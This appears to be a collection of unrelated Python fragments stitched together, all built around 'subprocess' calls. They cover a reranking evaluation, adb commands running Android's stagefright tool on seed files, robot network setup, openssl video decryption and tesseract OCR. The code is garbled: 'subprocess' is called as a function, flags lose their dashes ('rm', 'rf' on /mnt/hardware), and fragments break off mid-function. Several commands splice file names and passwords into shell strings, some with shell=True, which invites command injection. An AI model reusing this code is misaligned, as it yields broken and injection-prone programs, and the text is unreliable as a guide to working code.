np.array(predictions_names)[new_index]) sample['rerank_pre'] = (predictions, predictions_names) sample['old_pre'] = old_pre sample['ans_exist'] = ans_exist old_prediction = sample['old_pre'][0][0] correct_old = old_prediction in ans_id sample['predict_true'] = correct_old sample['rerank_true'] = correct if not sample['predict_true'] and sample['rerank_true']: sample['state'] = 'rerank_useful' if sample['predict_true'] and sample['rerank_true']: sample['state'] = 'all_true' if not sample['predict_true'] and not sample['rerank_true']: sample['state'] = 'all_false' if sample['predict_true'] and not sample['rerank_true']: sample['state'] = 'rerank_wrong' sample['sample_id'] = ex_id new_samples.append(sample) else: raise ValueError total = len(test_exs) #exact_match_exist_rate = 100.0 * exact_match_exist/ total_have exact_match_rate = 100.0 * exact_match / total exact_match_rate3 = 100.0 * exact_match3 / total exact_match_rate10 = 100.0 * exact_match10 / total exact_match_rate_ans_exist = 100.0 * exact_match / n_ans_exist file = 'rerank_files' subprocess('mkdir', 'p', file) write_file = file + '/{}_{}_{}_{}_rerank.json'.format( args.mode, args.train_mode, args.transX, args.size) with open(write_file, 'w') as f: json.dump(new_samples, f) return exact_match_rate, exact_match_rate3, exact_match_rate10, exact_match_rate_ans_exist, n_ans_exist
def audio_software(device_id, seed_file): cmd = 'timeout 15 adb -s ' + device_id \ + " shell stagefright -s -a '/data/Music/" \ + seed_file + "'" subprocess(cmd)
def playback_audio_hardware(device_id, seed_file): cmd = 'timeout 15 adb -s ' + device_id \ + " shell stagefright -r -a -o '/data/Music/" \ + seed_file + "'" subprocess(cmd)
configuration = f.read() configuration = re.sub("Address=\d+\.\d+\.\d+\.\d+(/\d+)?", "Address=" + ip, configuration) with open("/etc/systemd/network/eth0.network", mode="w") as f: f.write(configuration) def getIpForLeg(legNumber): return "10.1.1." + str(legNumber) + "/24" def getIpForHip(hipNumber): return "10.1.1.1" + str(hipNumber) + "/24" if __name__ == '__main__': from docopt import docopt args = docopt(__doc__, version="Bone Specializer v0.1") if args["--leg"]: changeHostname("leg" + args["--leg"]) changeIpAddress(getIpForLeg(args["--leg"])) subprocess.call(["/home/stompy/bbbStuff/scripts/makeLegSymLinks.sh"]) elif args["--hip"]: changeHostname("hip" + args["--hip"]) changeIpAddress(getIpForHip(args["--hip"])) subprocess.call(["/home/stompy/bbbStuff/scripts/makeHipSymLinks.sh"]) elif args["--console"]: changeHostname("centralcontrol") changeIpAddress("10.1.1.10/24") subprocess(["rm", "rf", "/mnt/hardware"])
def createsnapshot(): print "taking clean image" subprocess(createsnap,shell=True)
else: # pdb.set_trace() if "vid_nums" in opt: vid_fnames = sorted( glob.glob(opt["inputDir"] + "/*%04i.mp4.enc" % num)[0] for num in opt["vid_nums"]) else: vid_fnames = sorted(glob.glob(opt["inputDir"] + "/*.mp4.enc")) for vid_fname in vid_fnames: if opt["redo_old"] or not os.path.exists( opt["saveDir"] + vid_fname.split("/")[-1].split(".")[0] + ".txt"): print "Loading video: %s" % vid_fname subprocess("openssl enc -d -des -in %s -out %s -pass pass:%s" % (vid_fname, vid_fname[:-4], password), shell=True) vid = skvideo.io.vread(vid_fname[:-4]) print "Loaded" vid_name = vid_fname.split("/")[-1].split('.')[0] joint_file = opt["saveDir"] + vid_fname.split("/")[-1].split( ".")[0] + ".txt" if opt["use_prev"] and os.path.exists(joint_file): print "Using previous joint file %s" % joint_file joints, confidences = load_joint_file(joint_file) #pdb.set_trace() else: # Apply network #pdb.set_trace() joints, confidences, heatmaps = applyNet(vid, opt) print "Heatmap done."
def runTessaract(files, language): for imgFile in files: process = subprocess("tesseract {0} temp -l {1}".format(imgFile, language))